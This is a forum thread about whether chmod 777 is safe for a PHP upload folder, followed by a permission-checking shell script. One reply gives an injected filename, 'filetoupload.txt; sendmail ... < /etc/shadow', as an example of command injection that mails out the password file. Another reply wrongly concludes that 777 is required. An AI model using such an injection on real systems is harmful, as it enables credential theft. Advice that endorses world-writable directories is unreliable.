petervanlaer

Is it safe to chmod to 777 on a vps or dedicated server?

Hi,
I'm writing an upload app in PHP. The uploaded files are moved and checked by PHP. But my client is on a shared hosting provider.
In order for PHP to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a VPS or dedicated server?

kind regards,
Peter
ASKER CERTIFIED SOLUTION
Kelly Black
This solution is only available to members.
petervanlaer

ASKER

as far as i understand it, *everyone* having permission doesn't include the average joe on the internet, but only everyone who has an account or access to that machine.

if the machine is:

* on a shared hosting solution
* has anon ftp access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. right?

feel free to correct any inaccuracies in the above; i'm not a unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random joe can laser all yer stuff if they don't have an account of some sort on the machine.

Well, here's the gist of it: if the perms are wide open, anything CAN and DOES happen. For example, some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.

Hi,

777 permission is not secure :( on any machine. When you run your PHP script it runs as that user, so I think a directory permission of 755 will be OK for your PHP script.

He's running an upload program. It needs write access.

Hi,

Yea, but the PHP script is probably running with his permissions, so a file 755 should be sufficient, as he has read, write and execute whereas the others only have read and execute.

Sorry, just double-checked mine; you will need 777 on uploads.

Simple question, simple answer: no
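
The 755-versus-777 back-and-forth in the replies turns on which permission class (owner, group or other) the account PHP runs as falls into for the upload directory. The script below is an added example, not code from any poster in this thread; the helper `write_class` and the account names `phpuser-example`, `phpgroup-example` and `stranger-example` are hypothetical.

```shell
#!/bin/sh
# write_class DIR USER "GROUP ..."  -> prints owner, group, other or none
# Reports which permission class, if any, gives USER write access to DIR.
# The kernel checks owner first, then group, then other; the first class
# that matches the account decides, even if a later class is more permissive.
write_class() {
    dir=$1 user=$2 ugroups=$3
    # ls -ld fields: mode, link count, owner, group, ...
    info=$(ls -ld "$dir" | awk '{print $1, $3, $4}')
    mode=${info%% *}; rest=${info#* }
    owner=${rest%% *}; group=${rest#* }
    # Write bits are characters 3 (owner), 6 (group) and 9 (other) of the mode
    o_w=$(printf '%s' "$mode" | cut -c3)
    g_w=$(printf '%s' "$mode" | cut -c6)
    w_w=$(printf '%s' "$mode" | cut -c9)
    if [ "$user" = "$owner" ]; then
        [ "$o_w" = w ] && echo owner || echo none
        return 0
    fi
    for g in $ugroups; do
        if [ "$g" = "$group" ]; then
            [ "$g_w" = w ] && echo group || echo none
            return 0
        fi
    done
    [ "$w_w" = w ] && echo other || echo none
}

# Constructed demo: a scratch directory stands in for the upload folder, and
# "phpuser-example" is a hypothetical account PHP runs as (not the owner).
demo=$(mktemp -d)
demo_group=$(ls -ld "$demo" | awk '{print $4}')
chmod 755 "$demo"   # owner-only write: PHP under another account cannot upload
echo "755, unrelated account: $(write_class "$demo" phpuser-example phpgroup-example)"
chmod 777 "$demo"   # upload works, but so does a write from every local account
echo "777, unrelated account: $(write_class "$demo" phpuser-example phpgroup-example)"
chmod 770 "$demo"   # write via a shared group, nothing for everyone else
echo "770, account in group:  $(write_class "$demo" phpuser-example "$demo_group")"
echo "770, unrelated account: $(write_class "$demo" stranger-example "")"
rmdir "$demo"
```

On a real host, pass the account PHP actually runs as and its groups (as reported by `id`). Making that account the owner or a group member of the upload directory with `chown` or `chgrp` gives it write access without setting the "other" write bit.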